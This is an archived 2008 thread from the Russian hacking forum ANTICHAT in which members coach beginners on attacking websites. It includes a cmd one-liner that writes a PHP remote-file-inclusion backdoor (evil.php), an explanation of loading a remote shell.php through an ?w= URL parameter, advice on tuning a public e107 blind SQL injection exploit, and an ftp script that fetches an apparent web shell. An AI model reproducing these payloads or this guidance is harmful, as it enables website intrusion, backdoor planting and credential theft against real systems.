ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.11.2008, 16:53
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Zinus
Просто через cmd никак ты не зальешь
>echo "<?include($_GET[w])?>" > /www/evil.php
можно в окошечко CMD вывести то что в файле .php написано???
>type dir/file.php
Что ето и как его использовать???
никак
|
|
|
09.11.2008, 19:04
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696
Репутация:
40
|
|
Привет всем!
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
Вот что выдаёт:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__
[+] Logged in with your account..
[+] Checking database delay, please wait..
[+] Normal delay: 4
[+] Benchmark delay: 6
[-] Benchmarck delay too small compared to normal delay, increase it.
Я так понимаю, тут написано, что нужно увеличить задержку чего-то. А чего и как - хз. И можно ли вообще это как-то увеличить? |
|
|
|
09.11.2008, 19:07
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
my $benchmark = 1000000; - наверное тут надо циферьку побольше поставить
или тупо во это вырезать:
Код:
if($bdelay - $ndelay < 4)
{
print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n";
exit ();
}
|
|
|
|
09.11.2008, 19:56
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
@diznt
я же тебе уже написал в прошлой теме, что так должно быть: при выполнении команды ftp пользователю предлагается ввести команды в консоли ftp. Я же писал выполни ftp /? узнаешь список команд. Если ты такой ленивый, то вот пример скачивания файла с удаленного ftp:
Код:
open ftp.someserver.com
user username password
ascii
cd /htdocs
get s.php
bye
затем сохраняешь это в файл ftp.txt и выполняешь команду в cmd:
ftp -n -s:C:\ftp.txt
В итоге ты скачаешь файл s.php с ftp-сервера под учетной записью пользователя username с паролем password
Или используй tftp, скачивай сервер по ссылке, которую я уже давал и запускай на своем компе, указав папку с доступными для скачивания файлами. |
|
|
|
09.11.2008, 19:58
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
или тупо во это вырезать:
тогда сплоит работать не будет, время задержки сервера должно быть достаточно существенным, чтобы скрипт мог отличить правильный и неправильный запрос
|
|
|
|
09.11.2008, 22:10
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
а что это такое
<?include($_GET[w])?>
и как это использовать???))
|
|
|
|
09.11.2008, 23:12
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от diznt
а что это такое
<?include($_GET[w])?>
и как это использовать???))
php.su
|
|
|
|
09.11.2008, 23:14
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
diznt, как сказал слип - php.su конечно же поможет .. ну а вообще - инклудь шелл и будет тебе радость 
|
|
|
|
09.11.2008, 23:33
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
есть язык программирования php.
в нем есть код.
в этом коде можно написать include($_GET[w]) и теперь при обращении к странице site.ru/index.php?w=http://ya.ru/shell.php мы можем использовать код из файла shell.php. Инклуд нужен, чтобы встраивать в код скрипта код из другого файла. как-то так) если не понял-пиши)
|
|
|
|
09.11.2008, 23:45
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
AFoST неа не пашет
пишу ***.com/test.php?w=http://z0u4.narod.ru/1.php
Не помогает... (даже если выбрать хост с поддержкой php)
Помогайте)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?935000){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?935007){kind=avatar}
Похожие темы
Линейный вид
